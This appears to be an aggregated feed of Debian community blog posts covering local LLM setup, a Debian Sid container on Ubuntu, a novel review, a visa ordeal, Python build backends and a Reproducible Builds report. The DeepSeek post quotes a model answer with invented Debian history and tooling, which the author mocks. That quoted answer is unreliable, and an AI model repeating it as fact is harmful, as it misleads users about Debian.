My journey in CS has always been driven by curiosity, determination, and a deep love for understanding software solutions at its tiniest, most complex levels. Taking ALX Africa Software Engineer track after High school was where it all started for me. During the 1-year intensive bootcamp, I delved into the intricacies of Linux programming and low-level programming with C, which solidified my foundational knowledge. This experience not only enhanced my technical skills but also taught me the importance of adaptability and self-directed learning. I discovered how to approach challenges with curiosity, igniting a passion for exploring software solutions in their most intricate forms. Each module pushed me to think critically and creatively, transforming my understanding of technology and its capabilities. Let s just say that I have always been drawn to asking, How does this happen?" And I just go on and on until I find an answer eventually and sometimes I don t but that s okay. That curiosity, combined with a deep commitment to learning, has guided my journey. Debian Webmaster My drive has led me to get involved in open-source contributions, where I can put my knowledge to the test while helping my community. Engaging with real-world experts and learning from my mistakes has been invaluable. One of the highlights of this journey was joining the Debian Webmasters team as an intern through Outreachy. Here, I have the honor of working on redesigning and migrating the old Debian webpages to make them more user-friendly. This experience not only allows me to apply my skills in a practical setting but also deepens my understanding of collaborative software development. Building My Skills: The Foundation of My Experience Throughout my academic and professional journey, I have taken on many roles that have shaped my skills and prepared me for what s ahead I believe. I am definitely not a one-trick pony, and maybe not completely a jack of all trade either but I am a bit diverse I d like to think. Here are the key roles that have defined my journey so far: Volunteer Developer at Yoris Africa (June 2022 - August 2023) I began my career by volunteering at Yoris, where I collaborated with a talented team to design and build the frontend for a mobile app. My contributions extended beyond just the frontend; I also worked on backend solutions and microservices, gaining hands-on experience in full-stack development. This role was instrumental in shaping my understanding of software architecture, allowing me to contribute meaningfully to projects while learning from experienced developers in a dynamic environment. Freelance Academics Software Developer (September 2023 - October 2024) I freelanced as an academic software developer, where I pitched and developed software solutions for universities in my community. One of my most notable projects was creating a Computer-Based Testing (CBT) software for a medical school, which featured a unique questionnaire and scoring system tailored to their specific needs. This experience not only allowed me to apply my technical skills in a real-world setting but also deepened my understanding of educational software requirements and user experience, ultimately enhancing the learning process for students. Open Source Intern at Debian Webmaster Team (November 2024 -) Perhaps the most transformative experience has been my role as an intern at Debian Webmasters. This opportunity allowed me to delve into the fascinating world of open source. As an intern, I have the chance to work on a project where we are redesigning and migrating the Debian webpages to utilize a new and faster technology: Go templates with Hugo. For a detailed look at the work and progress I made during my internship, as well as information on this project and how to get involved, you can check out the wiki. My ultimate goal with this role is to build a vibrant community for Debian in Africa and, if given the chance, to host a debian-cd mirror for faster installations in my region. You can connect with me through LinkedIn, or X (formerly Twitter), or reach out via email.

29 January 2025

Sergio Talens-Oliag: Testing DeepSeek with Ollama and Open WebUI

With all the recent buzz about DeepSeek and its capabilities, I ve decided to give it a try using Ollama and Open WebUI on my work laptop which has an NVIDIA GPU:
$ lspci   grep NVIDIA
0000:01:00.0 3D controller: NVIDIA Corporation GA107GLM [RTX A2000 8GB Laptop GPU]
             (rev a1)
For the installation I initially I looked into the approach suggested on this article, but after reviewing it I decided to go for a docker only approach, as it leaves my system clean and updates are easier.

Step 0: Install dockerI already had it on my machine, so nothing to do here.

Step 1: Install the nvidia-container-toolkit packageAs it is needed to use the NVIDIA GPU with docker I followed the instructions to install the package using apt from the NVIDIA website.

Step 2: Run the Open WebUI container bundled with OllamaI could install ollama directly on linux or run it on docker, but I found out that there is a container with Open WebUI bundled with Ollama, so I decided to use it instead. To start the container I ve executed the following command:
docker run -d \
  -e OLLAMA_HOST="0.0.0.0:11434" -p 127.0.0.1:11434:11434 \
  -p 127.0.0.1:3000:8080 \
  -v ollama:/root/.ollama \
  -v open-webui:/app/backend/data \
  --gpus=all --name open-webui --restart always \
  ghcr.io/open-webui/open-webui:ollama
Once the container is up and running, I can access the Open WebUI on http://localhost:3000/ and the Ollama API on http://localhost:11434/ (I added the OLLAMA_HOST environment variable to be bind the server to all the container IPs, as it is needed to export it to the host).

Step 3: Install DeepSeek-R1 model from Open WebUIAfter creating an admin user on the Open WebUI, I went to the select a model button and asked to download the deepseek-r1 model (at the time of writing this it matches version deepseek-r1:7b, which uses 4.7GB of space). After the download was completed I was able to start chatting with the model on my local machine.

Step 4: Ask a questionThe first question I asked was Can you tell me what is Debian? and the answer I got was:
Debian is one of the most popular Linux distributions used worldwide. It is an
open-source operating system that has been around since 1993 and is known for
its stability, security, and reliability. Debian is widely used in servers, data
centers, and enterprise environments because it provides a robust base platform
with excellent documentation, tools, and community support.
### Key Features of Debian:

1. **History**:
   - Debian started as a project called "Pop!!" (Pootle) led by Lars Knutsen, a
     developer from Denmark.
   - It was initially forked from the Linux distribution Red Hat's RH-Debian to
     gain independence and reduce reliance on Red Hat.

2. **Use Cases**:
   - Debian is commonly used as an operating system for servers due to its
     reliability and ease of use in enterprise environments.
   - It is also used for individual user machines (laptops, desktops) because it
     offers a smooth and stable experience.
   - Debian provides the foundation for many popular derivatives like Ubuntu,
     which are designed for consumer use.

3. **Supported Architectures**:
   - Debian supports all major Linux architectures, including 32-bit and 64-bit
     systems, and runs on a wide range of hardware from old servers to modern
     smartphones.

4. **Package Management**:
   - Debian comes with a robust package management system called **Debian Policy
     Language (DPL)**, which allows users to easily install, update, and manage
     software packages.
   - This makes it easy for users to keep their systems up to date without
     needing to download multiple repositories or deal with version conflicts.

5. **Security Focus**:
   - Debian is known for its strong security practices. It has a reputation for
     being one of the most stable Linux distributions, making it a favorite
     among organizations that prioritize security.
   - The distribution regularly updates its software packages to patch
     vulnerabilities and protect against common attacks.

6. **Compatibility with Servers**:
   - Debian is widely used in data centers because it provides a consistent and
     reliable environment for running servers and applications.
   - Many open-source projects are compatible with Debian, making it an ideal
     choice for developers who want to work on servers or distributed systems.

7. **Popularity**:
   - Debian has a large and active community of users and contributors.
   - It is one of the most widely used Linux distributions in the world, with
     many enterprise organizations relying on it as their primary operating
     system.
### Comparison with Other Distributions:
- **Ubuntu**: Ubuntu is based on Debian but adds graphical user interfaces (like
  Gutsy Gibbon), modern tools (like GIMP and LibreOffice), and integrates with
  Microsoft services.
- **RHEL (Red Hat Enterprise Linux)**: RHEL is a derivative of Red Hat's
  distribution, which forked from Debian. It focuses more heavily on enterprise
  security and support compared to Debian.
### Why Debian?
Debian is popular because:
- It is free and open-source, making it accessible to anyone.
- It provides excellent documentation and tools for system administrators.
- It has a strong focus on stability and reliability.
- It supports a wide range of hardware and software needs.
If you're looking for a reliable and flexible Linux distribution that works well
in both personal and enterprise environments, Debian is an excellent choice.
Haven t tried the same question with ChatGPT, but the History, Package Management and Comparison with Other Distributions sections are hilarious, but they provided me with important data:
  • Now I know that APT is the real Debian Project Leader, what don t know is why we have elections each year ;)
  • Linux Distributions are recursive Debian was a fork of Red Hat, which was a fork of Debian, which was a fork of Red Hat,
As everybody is testing the model I will not talk more about the chat and the results, I just thought that this answer was really funny.

Step 5: Install the DeepSeek Coder and DeepSeek Coder v2 models from Open WebUIAs done before, to download the models I went to the select a model button and asked to download the deepseek-coder and deepseek-coder-v2 models (the default version of version one is said to be really quick and small, while version two is supposed to be better but slower and bigger, so I decided to install both for testing).

Step 6: Integrate Ollama with NeovimSince some months ago I ve been using Github Copilot with Neovim; I don t feel it has been very helpful in the general case, but I wanted to try it and it comes handy when you need to perform repetitive tasks when programming. It seems that there are multiple neovim plugins that support ollama, for now I ve installed and configured the codecompanion plugin on my config.lua file using packer:
require('packer').startup(function()
  [...]
  -- Codecompanion plugin
  use  
    "olimorris/codecompanion.nvim",
    requires =  
      "nvim-lua/plenary.nvim",
      "nvim-treesitter/nvim-treesitter",
     
   
  [...]
end)
[...]
-- --------------------------------
-- BEG: Codecompanion configuration
-- --------------------------------
-- Module setup
local codecompanion = require('codecompanion').setup( 
  adapters =  
    ollama = function()
      return require('codecompanion.adapters').extend('ollama',  
        schema =  
          model =  
            default = 'deepseek-coder-v2:latest',
           
         ,
       )
    end,
   ,
  strategies =  
    chat =   adapter = 'ollama',  ,
    inline =   adapter = 'ollama',  ,
   ,
 )
-- --------------------------------
-- END: Codecompanion configuration
-- --------------------------------
I ve tested it a little bit and it seems to work fine, but I ll have to test it more to see if it is really useful, I ll try to do it on future projects.

ConclusionAt a personal level I don t like nor trust AI systems, but as long as they are treated as tools and not as a magical thing you must trust they have their uses and I m happy to see that open source tools like Ollama and models like DeepSeek available for everyone to use.

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don t believe it is really necessary or justified (I don t need support, I don t provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don t have a Debian Sid machine anymore and while I could reinstall my work machine, I ve decided I m going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I ve narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don t believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I ve decided to try incus instead of systemd-nspawn (I already have experience with it and while it works well it has less features than incus).

Installing incusAs this is a personal system where I want to try things, instead of using the packages included with Ubuntu I ve decided to install the ones from the zabbly incus stable repository. To do it I ve executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo $ VERSION_CODENAME )
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I ve installed the incus and the incus-extra packages, but once things work I ll probably install the incus-ui-canonical package too, at least for testing it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin groupTo be able to run incus commands as my personal user I ve added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I ve logged out and in again of my desktop session to make the changes effective.

Initializing the incus environmentTo configure the incus environment I ve executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.

Creating a Debian containerTo create a Debian container I ve used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec command can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed the apt update command fails because the network does not work, to fix it I ve executed the commands of the following section and re-run the apt update and apt dist-upgrade commands.

Making the incusbr0 bridge work with DockerTo avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make things persistent across reboots we need to add them each time the machine boots. As suggested by the incus documentation I ve installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules when installing:
sudo apt install iptables-persistent --purge

Integrating the DNS resolution of the container with the hostTo make DNS resolution for the ictus containers work from the host I ve followed the incus documentation. To set up things manually I ve run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="$ br_ipv4%/* ";
dns_domain="$ br_domain:=incus ";
resolvectl dns "$br" "$ dns_address ";
resolvectl domain "$br" "~$ dns_domain ";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I ve created the following service file:
sh -c "cat <<EOF   sudo tee /etc/systemd/system/incus-dns-$ br .service
[Unit]
Description=Incus per-link DNS configuration for $ br 
BindsTo=sys-subsystem-net-devices-$ br .device
After=sys-subsystem-net-devices-$ br .device
[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns $ br  $ dns_address 
ExecStart=/usr/bin/resolvectl domain $ br  ~$ dns_domain 
ExecStart=/usr/bin/resolvectl dnssec $ br  off
ExecStart=/usr/bin/resolvectl dnsovertls $ br  off
ExecStopPost=/usr/bin/resolvectl revert $ br 
RemainAfterExit=yes
[Install]
WantedBy=sys-subsystem-net-devices-$ br .device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-$ br .service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the containerTo use my host user and home directory inside the container I need to add the user and group to the container. First I ve added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group I ve added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user -name)"   cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
We have the shell alias to log with the root account, now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don t have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' /etc/sudoers.d/user"

Accessing the container using sshTo use the container as a real machine and log into it as I do on remote machines I ve installed the openssh-server and authorized my laptop public key to log into my laptop (as we are mounting the home directory from the host that allows us to log in without password from the local machine). Also, to be able to run X11 applications from the container I ve adusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.

Taking snapshots of the containerAs this is a system container we can take snapshots of it using the incus snapshot command; that can be specially useful to take snapshots before doing a dist-upgrade so we can rollback if something goes wrong. To work with container snapshots we run use the incus snapshot command, i.e. to create a snapshot we use de create subcommand:
incus snapshot create debian
The snapshot sub commands include options to list the available snapshots, restore a snapshot, delete a snapshot, etc.

ConclusionSince last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I ve changed the prompt to be able to notice easily where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects so I can work on a Debian Sid system without having to reinstall my work machine. I ll probably write more about it in the future, but for now, I m happy with the results.

26 January 2025

Russ Allbery: Review: Dark Matters

Review: Dark Matters, by Michelle Diener
Series: Class 5 #4
Publisher: Eclipse
Copyright: October 2019
ISBN: 0-6454658-6-0
Format: Kindle
Pages: 307
Dark Matters is the fourth book in the science fiction semi-romance Class 5 series. There are spoilers for all of the previous books, and although enough is explained that you could make sense of the story starting here, I wouldn't recommend it. As with the other books in the series, it follows new protagonists, but the previous protagonists make an appearance. You will be unsurprised to hear that the Tecran kidnapped yet another Earth woman. The repetitiveness of the setup would be more annoying if the book took itself too seriously, but it doesn't, and so I mostly find it entertaining. I thought Diener was going to dodge the obvious series structure, but now I am wondering if we're going to end up with one woman per Class 5 ship after all. Lucy is not on a ship, however, Tecran or otherwise. She is a captive in a military research facility on the Tecran home world. The Tecran are in very deep trouble given the events of the previous book and have decided that Lucy's existence is a liability. Only the intervention of some sympathetic Tecran scientists she partly befriended during her captivity lets her escape the facility before it's destroyed. Now she's alone, on an alien world, being hunted by the military. It's not entirely the fault of this book that it didn't tell the story that I wanted to read. The setup for Dark Matters implies this book will see the arrival of consequences for the Tecran's blatant violations of the Sentient Beings Agreement. I was looking forward to a more political novel about how such consequences could be administered. This is the sort of problem that we struggle with in our politics: Collective punishment isn't acceptable, but there have to be consequences sufficient to ensure that a state doesn't repeat the outlawed behavior, and yet attempting to deliver those consequences feels like occupation and can set off worse social ruptures and even atrocities. I wasn't expecting that deep of political analysis of what is, after all, a lighthearted SF adventure series, but Diener has been willing to touch on hard problems. The ethics of violence has been an ongoing theme of the series. Alas for me, this is not what we get. The arriving cavalry, in the form of a Class 5 and the inevitable Grih hunk to serve as the love interest du jour, quickly become more interested in helping Lucy elude pursuers (or escape captors) than in the delicate political situation. The conflict between the local population is a significant story element, but only as backdrop. Instead, this reads like a thriller or an action movie, complete with alien predators and a cinematic set piece finale. The political conflict between the Tecran and the United Council does reach a conclusion of sorts, but it's not that satisfying. Perhaps some of the political fallout will happen in future books, but here Diener simplifies the morality of the story in the climax and dodges out of the tricky ethical and social challenge of how to punish a sovereign nation. One of the things I like about this series is that it takes moral indignation seriously, but now that Diener has raised the (correct) complication that people have strong motivations to find excuses for the actions of their own side, I hope she can find a believable political resolution that isn't simple brute force. This entry in the series wasn't bad, but it didn't grab me. Lucy was fine as a protagonist; her ability to manipulate the Tecran into making mistakes fits the longer time she's had to study them and keeps her distinct from the other protagonists. But the small bit of politics we do see is unsatisfying and conveniently simplistic, and this book mostly degenerates into generic action sequences. Bane, the Class 5 ship featured in this story, is great when he's active, and I continue to be entertained by the obsession the Class 5 ships have with Earth women, but he's sidelined for too much of the story. I felt like Diener focused on the least interesting part of the story setup. If you've read this far, there's nothing wrong with this entry. You'll probably want to keep reading. But it felt like a missed opportunity. Followed in publication order by Dark Ambitions, a novella that returns to Rose to tell a side story. The next novel is Dark Class, in which we'll presumably see the last kidnapped Earth woman. Rating: 6 out of 10

21 January 2025

Ravi Dwivedi: The Arduous Luxembourg Visa Process

In 2024, I was sponsored by The Document Foundation (TDF) to attend the LibreOffice annual conference in Luxembourg from the 10th to the 12th of October. Being an Indian passport holder, I needed a visa to visit Luxembourg. However, due to my Kenya trip coming up in September, I ran into a dilemma: whether to apply before or after the Kenya trip. To obtain a visa, I needed to submit my application with VFS Global (and not with the Luxembourg embassy directly). Therefore, I checked the VFS website for information on processing time, which says:
As a rule, the processing time of an admissible Schengen visa application should not exceed 15 calendar days (from the date the application is received at the Embassy).
It also mentions:
If the application is received less than 15 calendar days before the intended travel date, the Embassy can deem your application inadmissible. If so, your visa application will not be processed by the Embassy and the application will be sent back to VFS along with the passport.
If I applied for the Luxembourg visa before my trip, I would run the risk of not getting my passport back in time, and therefore missing my Kenya flight. On the other hand, if I waited until after returning from Kenya, I would run afoul of the aforementioned 15 working days needed by the embassy to process my application. I had previously applied for a Schengen visa for Austria, which was completed in 7 working days. My friends who had been to France told me they got their visa decision within a week. So, I compared Luxembourg s application numbers with those of other Schengen countries. In 2023, Luxembourg received 3,090 applications from India, while Austria received 39,558, Italy received 52,332 and France received 176,237. Since Luxembourg receives a far fewer number of applications, I expected the process to be quick. Therefore, I submitted my visa application with VFS Global in Delhi on the 5th of August, giving the embassy a month with 18 working days before my Kenya trip. However, I didn t mention my Kenya trip in the Luxembourg visa application. For reference, here is a list of documents I submitted: I submitted flight reservations instead of flight tickets . It is because, in case of visa rejection, I would have lost a significant amount of money if I booked confirmed flight tickets. The embassy also recommends the same. After the submission of documents, my fingerprints were taken. The expenses for the visa application were as follows:
Service Description Amount (INR)
Visa Fee 8,114
VFS Global Fee 1,763
Courier 800
Total 10,677
Going by the emails sent by VFS, my application reached the Luxembourg embassy the next day. Fast-forward to the 27th of August 14th day of my visa application. I had already booked my flight ticket to Nairobi for the 4th of September, but my passport was still with the Luxembourg embassy, and I hadn t heard back. In addition, I also obtained Kenya s eTA and got vaccinated for Yellow Fever, a requirement to travel to Kenya. In order to check on my application status, I gave the embassy a phone call, but missed their calling window, which was easy to miss since it was only 1 hour - 12:00 to 1:00 PM. So, I dropped them an email explaining my situation. At this point, I was already wondering whether to cancel the Kenya trip or the Luxembourg one, if I had to choose. After not getting a response to my email, I called them again the next day. The embassy told me they would look into it and asked me to send my flight tickets over email. One week to go before my flight now. I followed up with the embassy on the 30th by a phone call, and the person who picked up the call told me that my request had already been forwarded to the concerned department and is under process. They asked me to follow up on Monday, 2nd September. During the visa process, I was in touch with three other Indian attendees.1 In the meantime, I got to know that all of them had applied for a Luxembourg visa by the end of the month of August. Back to our story, over the next two days, the embassy closed for the weekend. I began weighing my options. On one hand, I could cancel the Kenya trip and hope that Luxembourg goes through. Even then, Luxembourg wasn t guaranteed as the visa could get rejected, so I might have ended up missing both the trips. On the other hand, I could cancel the Luxembourg visa application and at least be sure of going to Kenya. However, I thought it would make Luxembourg very unlikely because it didn t leave 15 working days for the embassy to process my visa after returning from Kenya. I also badly wanted to attend the LibreOffice conference because I couldn t make it two years ago. Therefore, I chose not to cancel my Luxembourg visa application. I checked with my travel agent and learned that I could cancel my Nairobi flight before September 4th for a cancelation fee of approximately 7,000 INR. On the 2nd of September, I was a bit frustrated because I hadn t heard anything from the embassy regarding my request. Therefore, I called the embassy again. They assured me that they would arrange a call for me from the concerned department that day, which I did receive later that evening. During the call, they offered to return my passport via VFS the next day and asked me to resubmit it after returning from Kenya. I immediately accepted the offer and was overjoyed, as it would enable me to take my flight to Nairobi without canceling my Luxembourg visa application. However, I didn t have the offer in writing, so it wasn t clear to me how I would collect my passport from VFS. The next day, I would receive it when I would be on my way to VFS in the form of an email from the embassy which read:
Dear Mr. Dwivedi, We acknowledge the receipt of your email. As you requested, we are returning your passport exceptionally through VFS, you can collect it directly from VFS Delhi Center between 14:00-17:00 hrs, 03 Sep 2024. Kindly bring the printout of this email along with your VFS deposit receipt and Original ID proof. Once you are back from your trip, you can redeposit the passport with VFS Luxembourg for our processing. With best regards,
Consular Section GRAND DUCHY OF LUXEMBOURG
Embassy in New Delhi
I took a printout of the email and submitted it to VFS to get my passport. This seemed like a miracle - just when I lost all hope of making it to my Kenya flight and was mentally preparing myself to miss it, I got my passport back exceptionally and now I had to mentally prepare again for Kenya. I had never heard of an embassy returning passport before completing the visa process before. The next day, I took my flight to Nairobi as planned. In case you are interested, I have written two blog posts on my Kenya trip - one on the OpenStreetMap conference in Nairobi and the other on my travel experience in Kenya. After returning from Kenya, I resubmitted my passport on the 17th of September. Fast-forward to the 25th of September; I didn t hear anything from the embassy about my application process. So, I checked with TDF to see whether the embassy reached out to them. They told me they confirmed my participation and my hotel booking to the visa authorities on the 19th of September (6 days ago). I was wondering what was taking so long after the verification. On the 1st of October, I received a phone call from the Luxembourg embassy, which turned out to be a surprise interview. They asked me about my work, my income, how I came to know about the conference, whether I had been to Europe before, etc. The call lasted around 10 minutes. At this point, my travel date - 8th of October - was just two working days away as the 2nd of October was off due to Gandhi Jayanti and 5th and 6th October were weekends, leaving only the 3rd and the 4th. I am not sure why the embassy saved this for the last moment, even though I submitted my application 2 months ago. I also got to know that one of the other Indian attendees missed the call due to being in their college lab, where he was not allowed to take phone calls. Therefore, I recommend that the embassy agree on a time slot for the interview call beforehand. Visa decisions for all the above-mentioned Indian attendees were sent by the embassy on the 4th of October, and I received mine on the 5th. For my travel date of 8th October, this was literally the last moment the embassy could send my visa. The parcel contained my passport and a letter. The visa was attached to a page in the passport. I was happy that my visa had been approved. However, the timing made my task challenging. The enclosed letter stated:
Subject: Your Visa Application for Luxembourg
Dear Applicant, We would like to inform you that a Schengen visa has been granted for the 8-day duration from 08/10/2024 to 30/10/2024 for conference purposes in Luxembourg. You are requested to report back to the Embassy of Luxembourg in New Delhi through an email (email address redacted) after your return with the following documents:
  • Immigration Stamps (Entry and Exit of Schengen Area)
  • Restaurant Bills
  • Shopping/Hotel/Accommodation bills
Failure to report to the Embassy after your return will be taken into consideration for any further visa applications.
I understand the embassy wanting to ensure my entry and exit from the Schengen area during the visa validity period, but found the demand for sending shopping bills excessive. Further, not everyone was as lucky as I was as it took a couple of days for one of the Indian attendees to receive their visa, delaying their plan. Another attendee had to send their father to the VFS center to collect their visa in time, rather than wait for the courier to arrive at their home. Foreign travel is complicated, especially for the citizens of countries whose passports and currencies are weak. Embassies issuing visas a day before the travel date doesn t help. For starters, a last-minute visa does not give enough time for obtaining a forex card as banks ask for the visa. Further, getting foreign currency (Euros in our case) in cash with a good exchange rate becomes difficult. As an example, for the Kenya trip, I had to get US Dollars at the airport due to the plan being finalized at the last moment, worsening the exchange rate. Back to the current case, the flight prices went up significantly compared to September, almost doubling. The choice of airlines also got narrowed, as most of the flights got booked by the time I received my visa. With all that said, I think it was still better than an arbitrary rejection. Credits: Contrapunctus, Badri, Fletcher, Benson, and Anirudh for helping with the draft of this post.

  1. Thanks to Sophie, our point of contact for the conference, for putting me in touch with them.

12 January 2025

Bastian Venthur: Investigating the popularity of Python build backends over time (II)

Last year, I analyzed the popularity of build backends used in pyproject.toml files over time. This post is the update for 2024. Analysis Like last year, I m using Tom Forbes fantastic dataset containing information about every file within every release uploaded to PyPI. To get the current dataset, I followed the same process as in last year s analysis, so I won t repeat all the details here. Instead, I ll highlight the main steps: Downloading all the parquet files took roughly a week due to GitHub s rate limiting. Tom suggested leveraging the Git v2 protocol to fetch the data directly. This approach could bypass rate limiting and complete the download of all pyproject.toml files in just 20 minutes(!). However, I couldn t find sufficient documentation that would help me to implement this method, so this will have to wait until next year s analysis. Once all the data is downloaded, I perform some preprocessing: Results I modified the plots a bit from last year to make them easier to read. Most notably, I binned the data into quarters to make the plots less noisy, and secondly, I stopped stacking the relative distribution plots to make the percentages directly readable. The first plot shows the absolute number of uploads (in thousands) by quarter and build backend. Absolute distribution of build backends by quarter The second plot shows the relative distribution of build backends by quarter. Relative distribution of build backends by quarter In 2024, we observe that: The script for downloading and analyzing the data is available in my GitHub repository. If someone has insights or examples on implementing the Git v2 protocol to download the pyproject.toml file given the repository URL and its hash, I d love to hear from you!

9 January 2025

Reproducible Builds: Reproducible Builds in December 2024

Welcome to the December 2024 report from the Reproducible Builds project! Our monthly reports outline what we ve been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As ever, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. reproduce.debian.net
  2. debian-repro-status
  3. On our mailing list
  4. Enhancing the Security of Software Supply Chains
  5. diffoscope
  6. Supply-chain attack in the Solana ecosystem
  7. Website updates
  8. Debian changes
  9. Other development news
  10. Upstream patches
  11. Reproducibility testing framework

reproduce.debian.net Last month saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. rebuilderd is our server designed monitor the official package repositories of Linux distributions and attempts to reproduce the observed results there. This month, however, we are pleased to announce that not only does the service now produce graphs, the reproduce.debian.net homepage itself has become a start page of sorts, and the amd64.reproduce.debian.net and i386.reproduce.debian.net pages have emerged. The first of these rebuilds the amd64 architecture, naturally, but it also is building Debian packages that are marked with the no architecture label, all. The second builder is, however, only rebuilding the i386 architecture. Both of these services were also switched to reproduce the Debian trixie distribution instead of unstable, which started with 43% of the archive rebuild with 79.3% reproduced successfully. This is very much a work in progress, and we ll start reproducing Debian unstable soon. Our i386 hosts are very kindly sponsored by Infomaniak whilst the amd64 node is sponsored by OSUOSL thank you! Indeed, we are looking for more workers for more Debian architectures; please contact us if you are able to help.

debian-repro-status Reproducible builds developer kpcyrd has published a client program for reproduce.debian.net (see above) that queries the status of the locally installed packages and rates the system with a percentage score. This tool works analogously to arch-repro-status for the Arch Linux Reproducible Builds setup. The tool was packaged for Debian and is currently available in Debian trixie: it can be installed with apt install debian-repro-status.

On our mailing list On our mailing list this month:
  • Bernhard M. Wiedemann wrote a detailed post on his long journey towards a bit-reproducible Emacs package. In his interesting message, Bernhard goes into depth about the tools that they used and the lower-level technical details of, for instance, compatibility with the version for glibc within openSUSE.
  • Shivanand Kunijadar posed a question pertaining to the reproducibility issues with encrypted images. Shivanand explains that they must use a random IV for encryption with AES CBC. The resulting artifact is not reproducible due to the random IV used. The message resulted in a handful of replies, hopefully helpful!
  • User Danilo posted an in interesting question related to their attempts in trying to achieve reproducible builds for Threema Desktop 2.0. The question resulted in a number of replies attempting to find the right combination of compiler and linker flags (for example).
  • Longstanding contributor David A. Wheeler wrote to our list announcing the release of the Census III of Free and Open Source Software: Application Libraries report written by Frank Nagle, Kate Powell, Richie Zitomer and David himself. As David writes in his message, the report attempts to answer the question what is the most popular Free and Open Source Software (FOSS)? .
  • Lastly, kpcyrd followed-up to a post from September 2024 which mentioned their desire for someone to implement a hashset of allowed module hashes that is generated during the kernel build and then embedded in the kernel image , thus enabling a deterministic and reproducible build. However, they are now reporting that somebody implemented the hash-based allow list feature and submitted it to the Linux kernel mailing list . Like kpcyrd, we hope it gets merged.

Enhancing the Security of Software Supply Chains: Methods and Practices Mehdi Keshani of the Delft University of Technology in the Netherlands has published their thesis on Enhancing the Security of Software Supply Chains: Methods and Practices . Their introductory summary first begins with an outline of software supply chains and the importance of the Maven ecosystem before outlining the issues that it faces that threaten its security and effectiveness . To address these:
First, we propose an automated approach for library reproducibility to enhance library security during the deployment phase. We then develop a scalable call graph generation technique to support various use cases, such as method-level vulnerability analysis and change impact analysis, which help mitigate security challenges within the ecosystem. Utilizing the generated call graphs, we explore the impact of libraries on their users. Finally, through empirical research and mining techniques, we investigate the current state of the Maven ecosystem, identify harmful practices, and propose recommendations to address them.
A PDF of Mehdi s entire thesis is available to download.

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 283 and 284 to Debian:
  • Update copyright years. [ ]
  • Update tests to support file 5.46. [ ][ ]
  • Simplify tests_quines.py::test_ differences,differences_deb to simply use assert_diff and not mangle the test fixture. [ ]

